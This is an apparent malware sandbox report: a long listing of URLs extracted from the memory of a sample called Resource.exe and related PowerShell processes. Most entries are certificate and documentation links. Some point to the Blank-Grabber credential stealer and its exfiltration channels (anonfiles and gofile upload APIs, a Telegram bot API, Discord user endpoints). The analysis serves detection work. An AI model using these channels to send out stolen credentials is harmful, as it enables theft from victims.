00000000.00000003.2016211296.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016081107.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2015892207.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2018048901.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016286257.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2017614505.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016456861.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019287428.00000203A2F51000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2018246304.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, python311.dll.0.dr, select.pyd.0.dr, _decimal.pyd.0.drString found in binary or memory: http://ocsp.digicert.com0A
              Source: Resource.exe, 00000000.00000003.2016619033.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2017977905.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016385260.00000203A2F50000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016535056.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019287428.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019633283.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2015982249.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016385260.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019397259.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016211296.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016081107.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2015892207.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2018048901.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016286257.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2017614505.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016456861.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019287428.00000203A2F51000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2018246304.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, python311.dll.0.dr, select.pyd.0.dr, _decimal.pyd.0.drString found in binary or memory: http://ocsp.digicert.com0C
              Source: Resource.exe, 00000000.00000003.2016619033.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2017977905.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016535056.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019287428.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019633283.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2015982249.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016385260.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019397259.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016211296.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016081107.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2015892207.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2018048901.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016286257.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2017614505.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016456861.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2018246304.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, python311.dll.0.dr, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.drString found in binary or memory: http://ocsp.digicert.com0X
              Source: Resource.exe, 00000000.00000003.2018935151.00000203A2F44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
              Source: Resource.exe, 00000000.00000003.2018935151.00000203A2F44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
              Source: powershell.exe, 00000044.00000002.2259141089.000001B7D57AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: Resource.exe, 00000000.00000003.2018935151.00000203A2F44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcb.com/universal-root.crl0
              Source: Resource.exe, 00000000.00000003.2018935151.00000203A2F44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcd.com06
              Source: powershell.exe, 0000000E.00000002.2197740500.000001CEC3AAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: powershell.exe, 0000000E.00000002.2197740500.000001CEC3881000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.2259141089.000001B7D5581000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 0000000E.00000002.2197740500.000001CEC3AAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
              Source: Resource.exe, 00000001.00000002.2475852502.0000020AB419C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
              Source: Resource.exe, 00000000.00000003.2018935151.00000203A2F44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
              Source: Resource.exe, 00000000.00000003.2018935151.00000203A2F44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
              Source: Resource.exe, 00000000.00000003.2018935151.00000203A2F44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
              Source: Resource.exe, 00000000.00000003.2018935151.00000203A2F44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
              Source: Resource.exe, 00000000.00000003.2018935151.00000203A2F44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
              Source: Resource.exe, 00000000.00000003.2018935151.00000203A2F44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
              Source: powershell.exe, 00000044.00000002.2349979588.000001B7ED6DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wwCerAut_206-23.crt0
              Source: powershell.exe, 00000044.00000002.2259141089.000001B7D6BD3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: powershell.exe, 00000044.00000002.2259141089.000001B7D57AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: Resource.exe, 00000001.00000003.2032559881.0000020AB394B000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2032855046.0000020AB394B000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2031427069.0000020AB3864000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2031427069.0000020AB394B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cl.cam.ac.uk/~mgk25/iso-time.html
              Source: Resource.exe, 00000000.00000003.2016619033.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2017977905.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016535056.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019287428.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019633283.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2015982249.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016385260.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2019397259.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016211296.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016081107.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2015892207.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2018048901.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016286257.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2017614505.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2016456861.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000000.00000003.2018246304.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, python311.dll.0.dr, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.drString found in binary or memory: http://www.digicert.com/CPS0
              Source: Resource.exe, 00000001.00000002.2472335398.0000020AB36AD000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2035643120.0000020AB3D10000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2036471836.0000020AB3CF2000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2035643120.0000020AB3CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
              Source: Resource.exe, 00000001.00000002.2473117545.0000020AB3BAC000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2032559881.0000020AB394B000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2032855046.0000020AB394B000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2031700658.0000020AB3BB4000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2031427069.0000020AB394B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/time-zones/repository/tz-link.html
              Source: powershell.exe, 0000000E.00000002.2278599707.000001CEDBD4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
              Source: Resource.exe, 00000001.00000003.2470045759.0000020AB3D05000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2263382066.0000020AB3D05000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2263201578.0000020AB3CE1000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2469860904.0000020AB3CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft00~1.5.JSOy.
              Source: Resource.exe, 00000001.00000003.2245183110.0000020AB3CDC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft100~1.5.PBy.
              Source: Resource.exe, 00000001.00000002.2473942737.0000020AB3D08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoftOWNLO~1.TXTy.
              Source: Resource.exe, 00000001.00000003.2182066365.0000020AB3CE1000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2143553843.0000020AB3CE2000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2198157815.0000020AB3CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoftZXCVBN~1DB-y.
              Source: Resource.exe, 00000001.00000003.2032559881.0000020AB394B000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2032855046.0000020AB394B000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2031427069.0000020AB3864000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2031427069.0000020AB394B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm
              Source: Resource.exe, 00000001.00000003.2360929970.0000020AB47BA000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2205878951.0000020AB47BA000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2476060853.0000020AB42AC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://MD8.mozilla.org/1/m
              Source: Resource.exe, 00000001.00000002.2477629542.0000020AB4FAC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://account.bellmedia.c
              Source: powershell.exe, 0000000E.00000002.2197740500.000001CEC3881000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.2259141089.000001B7D5581000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: Resource.exe, 00000001.00000002.2476060853.0000020AB4218000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://allegro.pl/
              Source: Resource.exe, 00000001.00000002.2473004554.0000020AB39C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.anonfiles.com/upload
              Source: Resource.exe, 00000001.00000003.2030787005.0000020AB3901000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2030704997.0000020AB38CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.anonfiles.com/uploadr
              Source: Resource.exe, 00000001.00000002.2473004554.0000020AB39C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServer
              Source: Resource.exe, 00000001.00000003.2030787005.0000020AB3901000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2030704997.0000020AB38CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServerr~
              Source: Resource.exe, 00000001.00000003.2030787005.0000020AB3901000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2030704997.0000020AB38CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServerr~r
              Source: Resource.exe, 00000001.00000003.2030787005.0000020AB3901000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2030704997.0000020AB38CE000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2473004554.0000020AB39C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
              Source: Resource.exe, 00000001.00000002.2476060853.0000020AB41C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mo
              Source: powershell.exe, 00000044.00000002.2342371224.000001B7E55FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000044.00000002.2342371224.000001B7E55FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000044.00000002.2342371224.000001B7E55FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: Resource.exe, 00000000.00000003.2018935151.00000203A2F44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
              Source: Resource.exe, 00000000.00000003.2018935151.00000203A2F44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
              Source: Resource.exe, 00000000.00000003.2018935151.00000203A2F44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0.
              Source: Resource.exe, 00000001.00000002.2473004554.0000020AB39C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/users/
              Source: Resource.exe, 00000001.00000003.2030704997.0000020AB38CE000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2473004554.0000020AB39C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com/api/v9/users/
              Source: Resource.exe, 00000001.00000003.2033270433.0000020AB37F2000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2472629307.0000020AB37DE000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2035529511.0000020AB37E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
              Source: Resource.exe, 00000001.00000003.2024701640.0000020AB381C000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2029000040.0000020AB381C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://en.wikipedi
              Source: Resource.exe, 00000001.00000002.2475527189.0000020AB3EC0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
              Source: Resource.exe, 00000001.00000002.2473004554.0000020AB39C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/Blank-Grabber
              Source: Resource.exe, 00000001.00000003.2030787005.0000020AB3901000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2030704997.0000020AB38CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/Blank-Grabberi
              Source: Resource.exe, 00000001.00000003.2030787005.0000020AB3901000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2030704997.0000020AB38CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/Blank-Grabberr
              Source: Resource.exe, 00000001.00000003.2030164549.0000020AB38C8000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2030015652.0000020AB38EC000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2030430138.0000020AB392B000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2030064983.0000020AB388D000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2029783273.0000020AB3EC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/BlankOBF
              Source: powershell.exe, 00000044.00000002.2259141089.000001B7D57AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: Resource.exe, 00000001.00000002.2471811122.0000020AB18C4000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2024037750.0000020AB1913000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2023560970.0000020AB192B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
              Source: Resource.exe, 00000001.00000002.2472003336.0000020AB3168000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
              Source: Resource.exe, 00000001.00000003.2023560970.0000020AB192B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
              Source: Resource.exe, 00000001.00000002.2471811122.0000020AB18C4000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2024037750.0000020AB1913000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2023560970.0000020AB192B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
              Source: Resource.exe, 00000001.00000003.2033438155.0000020AB3883000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2472335398.0000020AB3636000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2033114916.0000020AB3CBC000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2033504916.0000020AB3CBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/issues/86361.
              Source: Resource.exe, 00000001.00000002.2471811122.0000020AB18C4000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2024037750.0000020AB1913000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2023560970.0000020AB192B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
              Source: Resource.exe, 00000001.00000002.2475527189.0000020AB3EC0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
              Source: Resource.exe, 00000001.00000002.2472629307.0000020AB3932000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
              Source: Resource.exe, 00000001.00000002.2475852502.0000020AB40C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
              Source: powershell.exe, 00000044.00000002.2259141089.000001B7D67F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: Resource.exe, 00000001.00000003.2262114078.0000020AB3D2A000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2153816176.0000020AB3CBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/
              Source: Resource.exe, 00000001.00000003.2469239519.0000020AB3D2F000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2473117545.0000020AB3CBC000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2363232730.0000020AB3D2A000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2162875077.0000020AB3CBC000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2208655261.0000020AB3D31000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2143553843.0000020AB3CE2000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2182427502.0000020AB3CBC000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2176084487.0000020AB3D2A000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2473991715.0000020AB3D31000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2198157815.0000020AB3D31000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2262114078.0000020AB3D2A000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2153816176.0000020AB3CBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail
              Source: Resource.exe, 00000001.00000002.2473117545.0000020AB3BCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail/
              Source: Resource.exe, 00000001.00000003.2030704997.0000020AB38CE000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2473004554.0000020AB39C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gstatic.com/generate_204
              Source: Resource.exe, 00000001.00000003.2182066365.0000020AB3CE1000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2470045759.0000020AB3D05000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2263382066.0000020AB3D05000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2473942737.0000020AB3D08000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2143553843.0000020AB3CE2000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2198157815.0000020AB3CE1000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2263201578.0000020AB3CE1000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2469860904.0000020AB3CE1000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2245183110.0000020AB3CDC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/
              Source: Resource.exe, 00000001.00000003.2262114078.0000020AB3D2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/
              Source: Resource.exe, 00000001.00000003.2034221177.0000020AB3864000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2033518977.0000020AB3976000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2032559881.0000020AB3976000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://json.org
              Source: Resource.exe, 00000001.00000002.2476060853.0000020AB42AC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
              Source: Resource.exe, 00000001.00000002.2477629542.0000020AB4FA4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com
              Source: powershell.exe, 0000000E.00000002.2266669419.000001CED38F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.2259141089.000001B7D6EED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.2342371224.000001B7E573D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.2342371224.000001B7E55FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000044.00000002.2259141089.000001B7D6BD3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
              Source: powershell.exe, 00000044.00000002.2259141089.000001B7D6BD3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
              Source: Resource.exe, 00000001.00000002.2472518311.0000020AB36C0000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.0.drString found in binary or memory: https://peps.python.org/pep-0205/
              Source: Resource.exe, 00000001.00000002.2483357030.00007FF8A8CCB000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: https://peps.python.org/pep-0263/
              Source: Resource.exe, 00000001.00000002.2472230674.0000020AB33C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png
              Source: Resource.exe, 00000001.00000003.2030704997.0000020AB38CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngz
              Source: Resource.exe, 00000000.00000003.2018935151.00000203A2F44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
              Source: Resource.exe, 00000001.00000003.2197829260.0000020AB3EB1000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2190023337.0000020AB3EB1000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2196747987.0000020AB3E39000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2190835333.0000020AB3E39000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2176084487.0000020AB3EB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
              Source: Resource.exe, 00000001.00000003.2156478415.0000020AB46A7000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2161281040.0000020AB46D2000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2163975768.0000020AB46D2000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2153816176.0000020AB3BFE000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2190168428.0000020AB3BFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
